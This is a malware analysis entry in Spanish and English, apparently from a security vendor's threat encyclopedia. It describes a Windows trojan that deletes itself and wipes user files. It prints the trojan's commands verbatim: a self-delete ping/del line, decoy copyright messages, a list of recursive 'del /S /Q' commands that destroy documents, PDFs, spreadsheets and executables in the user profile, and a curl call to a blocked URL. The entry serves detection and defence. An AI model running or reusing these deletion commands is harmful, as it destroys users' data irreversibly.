Trojan.Win32.VIGILANTCLEANER.ZKIG

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Se ejecuta y, a continuación, se elimina.

Elimina archivos para impedir la ejecución correcta de programas y aplicaciones.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Agrega los procesos siguientes:

• cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "{Malware Path}\{MalwareName}"
• If anti-analysis checks are bypassed:
  • %System%\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...
  • %System%\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation
  • %System%\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation
  • %System%\cmd.exe /c echo DO NOT STOP THE PROCESS
  • %System%\cmd.exe /c echo Wait a minute...
  • %System%\cmd.exe /c @echo OFF
  • %System%\cmd.exe /c del /S /Q *.doc %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.docm %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.docx %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.dot %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.dotm %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.dotx %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.pdf %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.csv %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.xls %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.xlsx %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.xlsm %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.ppt %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.pptx %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.pptm %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.jtdc %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.jttc %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.jtd %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.jtt %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.txt %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.exe %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c del /S /Q *.log %System Root%\users\%username%\ > nul
  • %System%\cmd.exe /c curl -s -e https://www.x{BLOCKED}.com -A "Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0" https://www.x{BLOCKED}.com/video64080443/_ > nul

Se ejecuta y, a continuación, se elimina.

Otras modificaciones del sistema

Elimina los archivos siguientes:

• inside the following directories:
  • %User Profile%
  • {Malware Path}
• with the following extensions:
  • *.doc
  • *.docm
  • *.docx
  • *.dot
  • *.dotm
  • *.dotx
  • *.pdf
  • *.csv
  • *.xls
  • *.xlsx
  • *.xlsm
  • *.ppt
  • *.pptx
  • *.pptm
  • *.jtdc
  • *.jttc
  • *.jtd
  • *.jtt
  • *.txt
  • *.exe
  • *.log

(Nota: %User Profile% es la carpeta de perfil del usuario activo, que en el caso de Windows 98 y ME suele estar en C:\Windows\Profiles\{nombre de usuario}, en el caso de Windows NT en C:\WINNT\Profiles\{nombre de usuario}, en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) en C:\Documents and Settings\{nombre de usuario} y en el caso de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}).

Otros detalles

Hace lo siguiente:

• It logs its routine in the console.
• It attempts to connect to the following URL:
  • https://www.x{BLOCKED}.com/video64080443/_
  • with the following specifications:
    • Referrer: https://www.x{BLOCKED}.com
    • User-Agent: Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0